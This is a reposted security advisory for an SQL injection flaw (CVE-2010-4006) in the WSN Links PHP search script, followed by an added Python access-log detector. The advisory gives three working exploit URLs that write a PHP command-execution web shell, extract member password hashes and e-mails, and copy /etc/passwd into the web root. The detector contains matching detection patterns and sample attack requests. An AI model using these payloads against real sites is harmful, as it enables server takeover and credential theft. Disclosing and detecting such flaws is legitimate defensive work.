myhack58, Anonymous, MYHACK58:62201028423
History: Nov 26, 2010 - 12:00 a.m.

WSN Links SQL injection vulnerability - vulnerability warning - the black bar safety net


EPSS: 0.001 (Low), Percentile: 42.7%

WSN Links is an advanced PHP/MySQL-based search script. In WSN Links versions < 6.0.1, < 5.1.51, and < 5.0.81, the search.php file contains SQL injection vulnerabilities that could lead to sensitive information disclosure.

[+]info:

'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)
Mark Stanislav - mark.stanislav@gmail.com 

[+]poc: 
  1. A ‘UNION SELECT’ which results in a PHP shell-execution script being written to a file
    http://example.com/search.php?namecondition=IS NULL))%20UNION%20((SELECT%20"<?php%20system($_REQUEST[cmd]);%20?>"%20INTO%20OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories

  2. A ‘UNION SELECT’ which results in a member’s name, password hash, and e-mail being extracted to a file
    http://example.com/search.php?namecondition=IS NOT NULL))%20UNION%20((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=/var/www/pass.txt&action=filter&filled=1&whichtype=categories

  3. A ‘UNION SELECT’ which results in the /etc/passwd file being copied to a web directory file
    http://example.com/search.php?namecondition=IS NOT NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd.txt&action=filter&filled=1&whichtype=categories
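
Added example (not part of the original advisory or of WSN Links): a Python access-log check that flags requests to search.php whose namecondition or namesearch parameters carry the SQL constructs used in the PoC URLs above. The log lines, the benign `like` value, the finding names and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# SQL constructs that appear in the PoC URLs for search.php.
SQL_SIGNS = {
    "union-select": re.compile(r"\bunion\b[\s(]*\bselect\b", re.I),
    "into-outfile": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "paren-breakout": re.compile(r"\)\s*\)"),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def inspect_line(line):
    """Return sorted finding names for one access-log line ([] if clean)."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/search.php"):
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    findings = set()
    for name in ("namecondition", "namesearch"):
        for value in params.get(name, []):
            findings.update(k for k, rx in SQL_SIGNS.items() if rx.search(value))
    # In the PoCs the OUTFILE target path travels in namesearch.
    paths = [v for v in params.get("namesearch", []) if v.startswith("/")]
    if "into-outfile" in findings and paths:
        findings.add("outfile-path-in-namesearch")
    return sorted(findings)

def scan(lines):
    """Return (line_number, findings) for every flagged line."""
    hits = ((n, inspect_line(text)) for n, text in enumerate(lines, 1))
    return [(n, f) for n, f in hits if f]

TAIL = "&action=filter&filled=1&whichtype=categories HTTP/1.1"
SAMPLE_LOG = [  # constructed lines, not real traffic
    '203.0.113.5 - - [26/Nov/2010:10:00:01 +0000] "GET /search.php'
    '?namecondition=like&namesearch=news' + TAIL + '" 200 5120',
    '203.0.113.9 - - [26/Nov/2010:10:00:07 +0000] "GET /search.php'
    '?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%201%20INTO%20OUTFILE'
    '&namesearch=/tmp/out.txt' + TAIL + '" 200 312',
    '203.0.113.9 - - [26/Nov/2010:10:00:09 +0000] "GET /search.php'
    '?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20load_file(0x41)'
    '%20INTO%20OUTFILE&namesearch=/tmp/out2.txt' + TAIL + '" 200 312',
]
```

The check only sees query strings, so parameters sent in a POST body need the same patterns applied wherever request bodies are logged.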

[+]Reference:

http://www.wsnlinks.com/ 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006 
http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/ 
